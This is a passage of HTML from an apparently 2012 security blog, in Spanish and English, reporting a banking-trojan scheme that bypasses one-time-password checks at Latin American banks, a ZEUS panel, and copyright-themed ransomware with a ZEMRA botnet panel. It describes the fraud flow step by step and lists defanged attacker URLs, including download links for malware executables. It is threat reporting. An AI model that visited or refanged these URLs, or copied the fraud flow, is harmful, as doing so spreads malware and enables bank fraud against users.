<br /></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Criminals can even send commands to blocks the electronic banking account of legitimate user to prevent access once the fraud has been realized.</span><span lang="EN-US" style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-ansi-language: EN-US; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Also at the same malicious server infrastructure has been located an Control Panel of the old ZEUS banker troyan fully active and operational, collecting confidential data from infected victims.</span><span lang="EN-US" style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-ansi-language: EN-US; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-8_TJWsikT5g/UHMw4VRAt5I/AAAAAAAAANo/011qUZgk4SI/s1600/zeus.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="494" src="http://3.bp.blogspot.com/-8_TJWsikT5g/UHMw4VRAt5I/AAAAAAAAANo/011qUZgk4SI/s640/zeus.JPG" width="640" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"> </span><span style="color: #333333; font-family: Arial, sans-serif;">It is visible in this statistical panel of ZEUS Troyan the high hit rate of infected users belonging to countries that was focused the fraud.</span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Below there is a small sample of the confidential data captured by the keylogger of the troyan in the infected user machines.</span><span lang="EN-US" style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-ansi-language: EN-US; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ZpIS29dj68c/UHMw9qfQjfI/AAAAAAAAANw/gdkY14S-uRU/s1600/grabbed.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="http://2.bp.blogspot.com/-ZpIS29dj68c/UHMw9qfQjfI/AAAAAAAAANw/gdkY14S-uRU/s640/grabbed.JPG" width="640" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-2573772688408132772012-10-08T13:07:00.000-07:002012-10-09T16:16:52.031-07:00Ataque contra los dispositivos OTP en entidades Latinas<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Ha sido descubierto la infraestructura criminal de un sitio Web preparado para evadir los mecanismos de autenticación OTP ( One Time Password ) o Contraseña de un solo uso de la banca electrónica de entidades Latinas con fines fraudulentos<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Este sitio esta hospedado en el dominio <b>cybercartel.com.mx</b> que esta alojado en <st1:personname productid="la IP" w:st="on">la IP</st1:personname> 65.254.32.66 de USA<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Los criminales han dirigido su ataque únicamente contra los clientes de las entidades bancarias de Argentina, Bolivia , Chile y Mexico de una manera bastante practica que consiste en bloquear los accesos al servidor de cualquier dirección IP que no pertenezca al rango IP de los proveedores ISP de dichos países.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Para ello han creado en el archivo .htaccess del servidor apache una lista de rangos permitidos. Cualquier acceso desde una IP no permitida devolverá al usuario un error 403 Forbidden tal como se observa en la captura:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-anXPTNdTg5I/UHMv3fqP32I/AAAAAAAAANI/W0JnON4S_dk/s1600/forbidden.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="349" src="http://4.bp.blogspot.com/-anXPTNdTg5I/UHMv3fqP32I/AAAAAAAAANI/W0JnON4S_dk/s640/forbidden.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 11pt;">Con este método los criminales logran varios objetivos. Por un lado lograr un alto número de impactos positivos de usuarios infectados de estos países, reduciendo también la carga del servidor rechazando las conexiones de usuarios que no interesan y sobre todo denegar el acceso de las compañías de Seguridad </span><span style="font-size: 15px;">Informáticas</span><span style="font-size: 11pt;"> y Antivirus, así Cuerpos policiales de otros países que intenten investigar que almacena dicho servidor.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">El archivo .htaccess tiene el siguiente formato:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oPAXf2P90aQ/UHMwK8N2HsI/AAAAAAAAANQ/syiO1dBQ76c/s1600/access.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-oPAXf2P90aQ/UHMwK8N2HsI/AAAAAAAAANQ/syiO1dBQ76c/s1600/access.jpg" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Se ha eliminado el resto de líneas de rangos IP de acceso debido al gran número de ellas.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">A continuación vamos a explicar en este artículo como se realiza el ataque contra los mecanismos de autenticación OTP de la banca electrónica de las entidades financieras afectadas:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">El proceso de la realización del fraude por los criminales se sintetiza en los siguientes pasos:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">1.<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: Arial; font-size: 11pt;">El equipo del usuario se infecta con el troyano bancario.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">2.<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: Arial; font-size: 11pt;">El troyano empieza a capturar de forma silenciosa mediante técnicas keylogger clásicas todas las contraseñas y passwords de los sitios a los que accede el usuario.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">3.<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: Arial; font-size: 11pt;">Cuando el usuario accede a su Banca electrónica mediante el navegador, el troyano se activa y pasa a tomar el control de la navegación del usuario.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">4.<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: Arial; font-size: 11pt;">En eso instante el troyano envía un aviso mediante mensajería Jabber a un criminal que esta operando en remoto y que va a crear una orden de transferencia fraudulenta accediendo en paralelo a la cuenta de la banca del usuario con las contraseñas antes capturadas por el keylogger.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">5.<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: Arial; font-size: 11pt;">Cuando la aplicación de banca solicite al criminal las claves OTP o cualquier otra clave necesaria para validar la transferencia el criminal enviara una orden al equipo del usuario infectado solicitando que introduzca este OTP.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">6.<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: Arial; font-size: 11pt;">Esta orden mostrará una ventana en la navegación del usuario solicitando la clave OTP autentica y que normalmente el usuario teclea al pensar que es una operativa habitual de su banca.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">7.<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: Arial; font-size: 11pt;">El código introducido es capturado por el troyano del equipo infectado y enviado también por Jabber al criminal<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;">
<span style="font-family: Arial; font-size: 11pt;">8.<span style="font-family: 'Times New Roman'; font-size: 7pt;"> </span></span><span style="font-family: Arial; font-size: 11pt;">El criminal lo introduce en la sesión de banca que ha iniciado validando la transferencia y finalizando el fraude con total éxito.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">A continuación se muestra en primicia uno de estos Paneles de Control con los que operan los criminales para realizar el ataque contra los sistemas de validación OTP - ( One Time Password ):<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><v:shape id="_x0000_i1026" style="height: 99pt; width: 425.25pt;" type="#_x0000_t75"><v:imagedata o:title="OTP" src="file:///C:\Windows\Temp\msohtml1\01\clip_image004.jpg"></v:imagedata></v:shape><!--[if !vml]--><!--[endif]--><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YQ2t7asQKsE/UHMweEsLJxI/AAAAAAAAANY/7JLrSaxPR34/s1600/OTP.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="http://4.bp.blogspot.com/-YQ2t7asQKsE/UHMweEsLJxI/AAAAAAAAANY/7JLrSaxPR34/s640/OTP.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Se observa como el operador que se conecta en remoto recibe toda la información en tiempo real de los datos confidenciales de la victima y cuando inicia el proceso de fraude va solicitando los datos necesarios mediante el siguiente menú de ordenes:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 247.8pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HmWGWViWuCw/UHMwqehelRI/AAAAAAAAANg/osC0Fgk6uBE/s1600/token.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-HmWGWViWuCw/UHMwqehelRI/AAAAAAAAANg/osC0Fgk6uBE/s320/token.jpg" width="225" /></a></div>
<div class="MsoNormal" style="margin-left: 247.8pt;">
<v:shape id="_x0000_s1026" o:allowoverlap="f" style="height: 324pt; left: 0px; margin-left: -0.3pt; margin-top: 0.3pt; position: absolute; text-align: left; width: 228pt; z-index: -1;" type="#_x0000_t75"><v:imagedata o:title="token" src="file:///C:\Windows\Temp\msohtml1\01\clip_image006.jpg"></v:imagedata></v:shape><span style="font-family: Arial; font-size: 11pt;">Incluso puede enviar órdenes de bloqueo de la cuenta de banca electrónica del usuario para que no puede volver a acceder una vez realizado el fraude y no se percate del mismo.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">En la misma infraestructura del servidor fraudulento se ha localizado también un Panel de Control del viejo troyano bancario ZEUS totalmente operativo y activo, recopilando datos confidenciales de las victimas infectadas:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-8_TJWsikT5g/UHMw4VRAt5I/AAAAAAAAANo/011qUZgk4SI/s1600/zeus.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="492" src="http://3.bp.blogspot.com/-8_TJWsikT5g/UHMw4VRAt5I/AAAAAAAAANo/011qUZgk4SI/s640/zeus.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Se observa en este panel estadístico del troyano ZEUS la alta tasa de acierto de los usuarios infectados pertenecientes a los países contra los que estaba enfocado el fraude.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">A continuación se presenta una muestra muy reducida de la captura de datos confidenciales que realiza el keylogger del troyano en los equipos de los usuarios infectados.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ZpIS29dj68c/UHMw9qfQjfI/AAAAAAAAANw/gdkY14S-uRU/s1600/grabbed.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="451" src="http://2.bp.blogspot.com/-ZpIS29dj68c/UHMw9qfQjfI/AAAAAAAAANw/gdkY14S-uRU/s640/grabbed.JPG" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-70482726015801587372012-09-25T07:07:00.001-07:002012-09-25T07:07:23.091-07:00Ransomeware Troyan - version intelecual property companies<br />
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The Ransomeware Troyan has been very popular lately
known as "Police Troyan"</span><span style="font-family: Arial, sans-serif; font-size: 11pt;"> </span><span style="font-family: Arial, sans-serif; font-size: 11pt;">because
after infection, user machine appeared locked showing a fake police webpage
indicating that the user is suspected of certain crimes and his machine will
remain locked until the payment of a penalty equivalent to certain amount of
money.</span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">At this time it was found a similar version of the
Troyan Ransomeware with same fraud technique but this time pretending that
victim has infringed some laws related to copyright and requesting payment of
the appropriate sanction.<o:p></o:p></span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">When user's computer has been infected, the Troyan
redirects user navigation to the malicious URL:<o:p></o:p></span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://invalid-crew.com/start.php</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">This malicious script checks language settings that
user has set on the browser to display a false webpage on user's language
simulating the legitimate institutions of his country that are dedicated to
protect copyright and intellectual property.<o:p></o:p></span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">For Spanish users the Troyan redirect to the URL:<o:p></o:p></span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://invalid-crew.com/payz/iframe_ES.php</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">That will show the next screen simulating come from
SGAE (General Society of Authors and Editors) – Spanish society<o:p></o:p></span><br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-N--PjoI6H5g/UF-EMMasydI/AAAAAAAAALo/2aiD2AFQTRM/s1600/ES.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="http://2.bp.blogspot.com/-N--PjoI6H5g/UF-EMMasydI/AAAAAAAAALo/2aiD2AFQTRM/s400/ES.jpg" width="400" /></a></div>
<br />
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">For Portugal:
hXXp://invalid-crew.com/payz/iframe_PT.php</span><span lang="EN-US"><o:p></o:p></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-o_fR9rFrID8/UF-ETpMLm4I/AAAAAAAAALw/vbEF6NDkmp4/s1600/PT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="http://2.bp.blogspot.com/-o_fR9rFrID8/UF-ETpMLm4I/AAAAAAAAALw/vbEF6NDkmp4/s400/PT.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">For Italy:
hXXp://invalid-crew.com/payz/iframe_IT.php</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ocvXQt7yrDQ/UF-Ejotv_lI/AAAAAAAAAL4/3D81bJCGeH8/s1600/IT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="http://4.bp.blogspot.com/-ocvXQt7yrDQ/UF-Ejotv_lI/AAAAAAAAAL4/3D81bJCGeH8/s400/IT.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">For France:
hXXp://invalid-crew.com/payz/iframe_FR.php</span><span lang="EN-US"><o:p></o:p></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-goUI09TfMVU/UF-EriOKbGI/AAAAAAAAAMA/RL7GnpJEHis/s1600/FR.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://3.bp.blogspot.com/-goUI09TfMVU/UF-EriOKbGI/AAAAAAAAAMA/RL7GnpJEHis/s400/FR.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">For Germany: hXXp://invalid-crew.com/payz/iframe_DE.php</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xmLzdUDpFCw/UF-EyBtwqNI/AAAAAAAAAMI/EwlkO0JIpiE/s1600/DE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="295" src="http://4.bp.blogspot.com/-xmLzdUDpFCw/UF-EyBtwqNI/AAAAAAAAAMI/EwlkO0JIpiE/s400/DE.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">The domain invalid-crew.com is hosted on the IP
95.163.68.147 belonging to the IPS Digital Networks CJSC in Russia.</span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">The Login screen to access Control Panel Ransomeware
Troyan has been located at the addresses:<o:p></o:p></span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://invalid-crew.com/admin/login.php</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">And:</span><span lang="EN-US"><o:p></o:p></span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://invalid-crew.com/bull/login.php</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-uZDbCDx9BSw/UF-E8Tdqu1I/AAAAAAAAAMQ/Du6q_NfPH4E/s1600/Ransomeware-Panel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://1.bp.blogspot.com/-uZDbCDx9BSw/UF-E8Tdqu1I/AAAAAAAAAMQ/Du6q_NfPH4E/s400/Ransomeware-Panel.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">Also has been located the control panel of BOTNET
ZEMRA at:<o:p></o:p></span><br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://invalid-crew.com/abc/admin/</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tDX-4fHvXaA/UF-FDqv6HkI/AAAAAAAAAMY/XOwsB0H7HeI/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="http://4.bp.blogspot.com/-tDX-4fHvXaA/UF-FDqv6HkI/AAAAAAAAAMY/XOwsB0H7HeI/s400/login.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<o:p> </o:p><span style="font-family: Arial, sans-serif; font-size: 11pt;">This panel control 5384 infected user machines, there
being a high percentage of percentage of Latinamerican users with compromised
machines.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Dmm338SHGOM/UF-FKHLsg3I/AAAAAAAAAMg/tW5oQutY8GI/s1600/statitics.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/-Dmm338SHGOM/UF-FKHLsg3I/AAAAAAAAAMg/tW5oQutY8GI/s400/statitics.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">According to the statistics menu, bots malware
spreading started on September 3, being the peak infections day September 5
with 2402 infected computers.<o:p></o:p></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-WSdsJ6n2RHs/UF-FQqkOxxI/AAAAAAAAAMo/9inyPh3_T9U/s1600/infects.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="http://3.bp.blogspot.com/-WSdsJ6n2RHs/UF-FQqkOxxI/AAAAAAAAAMo/9inyPh3_T9U/s400/infects.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<br />
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">In the control panel it is also possible to follow
downloads tasks of different malicious binaries on zombies computers.</span><span lang="EN-US"><o:p></o:p></span><br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-WbHFKz67y4I/UF-FXQORVfI/AAAAAAAAAMw/B_AF5yqQtXM/s1600/tasks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://2.bp.blogspot.com/-WbHFKz67y4I/UF-FXQORVfI/AAAAAAAAAMw/B_AF5yqQtXM/s400/tasks.jpg" width="400" /></a></div>
<div align="center" class="separator" style="text-align: center;">
<br /></div>
<o:p> </o:p><span style="background-color: whitesmoke; color: #333333; font-family: Arial, sans-serif; font-size: 12pt;">They
are still active infection vectors of the Troyans:</span><br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;"> </span><span lang="EN-US"><o:p></o:p></span><br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://95.163.68.147/abc/rat.exe</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://95.163.68.147/abc/rat1.exe</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://95.163.68.147/abc/fud.exe</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US;">hXXp://95.163.68.147/abc/server.exe</span><span lang="EN-US"><o:p></o:p></span><br />
<u1:p></u1:p>
<span style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hXXp://95.163.68.147/abc/cgg.exe</span><br />
<u1:p></u1:p>Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-1391620761437037432012-09-23T14:57:00.001-07:002012-09-23T15:10:07.102-07:00Troyano Ransomeware versión SGAE – Sociedades de Autores<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">El troyano Ransomeware
últimamente ha sido muy popular bajo la denominación de “troyano policía”, debido a que tras la infección el equipo de la victima aparecía bloqueado
mostrando una supuesta pagina falsa de la policía en la que indicaba que el
usuario era sospechoso de ciertos delitos y que su equipo se mantendría
bloqueado hasta que no se pagara la multa equivalente a cierta cantidad
monetaria.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">En esta
ocasión se ha localizado una versión similar con la misma técnica de fraude
pero esta vez simulando que ha infringido un delito relacionado con los
derechos de autor y solicitando el pago de la correspondiente sanción.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Cuando el
equipo del usuario ha sido infectado, el troyano redirige la navegación del
usuario hacia el enlace malicioso<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
